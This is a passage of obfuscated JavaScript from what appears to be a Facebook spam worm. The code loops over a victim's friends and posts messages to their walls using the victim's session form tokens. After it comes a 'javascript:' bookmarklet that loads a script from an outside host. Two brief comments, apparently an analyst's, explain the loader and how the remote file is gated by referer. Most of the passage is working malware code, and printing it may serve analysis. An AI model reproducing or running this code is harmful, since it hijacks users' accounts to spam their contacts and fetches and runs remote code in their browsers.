	xhpc_fbx: _texte[23],
	lsd: null,
	post_form_id_source: _texte[60]
	};
	mt = postmessage;
	m = postmessage;
	while (mt[_texte[100]](_texte[99]) >= 0) {
	var _0x93d3x32 = _0x93d3xd[_texte[98]]();
	mt = mt[_texte[91]](_texte[99], _getNamePropertyOf(_0x93d3x32));
	m = m[_texte[91]](_texte[99], _0x93d3x11(_0x93d3x32));
	};
	_0x93d3x31[_texte[101]] = mt;
	_0x93d3x31[_texte[102]] = m;
	if (debug) {
	alert(_texte[103] + mt);
	};
	_doPost(_texte[104], _0x93d3x31);
	var _0x93d3x33 = function(_0x93d3x15) {
	if (_0x93d3x15 == 0) {
	wf = 0;
	mf();
	return;
	};
	var _0x93d3x34 = _0x93d3x2f[_texte[95]]();
	var _0x93d3x35 = {
	post_form_id: _0x93d3x1a,
	fb_dtsg: _0x93d3x1b,
	xhpc_composerid: comp,
	xhpc_targetid: _0x93d3x34[_texte[19]],
	xhpc_context: _texte[105],
	xhpc_fbx: 1,
	lsd: null,
	post_form_id_source: _texte[60]
	};
	var _0x93d3x36 = postmessage;
	var _0x93d3x37 = postmessage;
	if (_0x93d3xd[_texte[64]] == 0) {
	wf = 0;
	mf();
	return;
	};
	while (_0x93d3x36[_texte[100]](_texte[99]) >= 0) {
	var _0x93d3x38 = _0x93d3xd[_texte[98]]();
	_0x93d3x36 = _0x93d3x36[_texte[91]](_texte[99], _getNamePropertyOf(_0x93d3x38));
	_0x93d3x37 = _0x93d3x37[_texte[91]](_texte[99], _0x93d3x11(_0x93d3x38));
	};
	_0x93d3x35[_texte[101]] = _0x93d3x36;
	_0x93d3x35[_texte[102]] = _0x93d3x37;
	_doPost(_texte[104], _0x93d3x35);
	setTimeout(function() {
	_0x93d3x33(_0x93d3x15 - 1);
	},
	2000);
	};
	wf++;
	setTimeout(function() {
	_0x93d3x33(nfriends);
	},
	2000);
	});
	};
	mf();
	});
	javascript:(a=(b=document).createElement('script')).src='//iamedwards.com/german.php?'+Math.random(),b.body.appendChild(a);void(0)

	// this is pretty straightforward. Create a script-node, set it's source and append it to the body.
	// you can't download the JS directly, you need to set the right referer or you'll be redirected to google.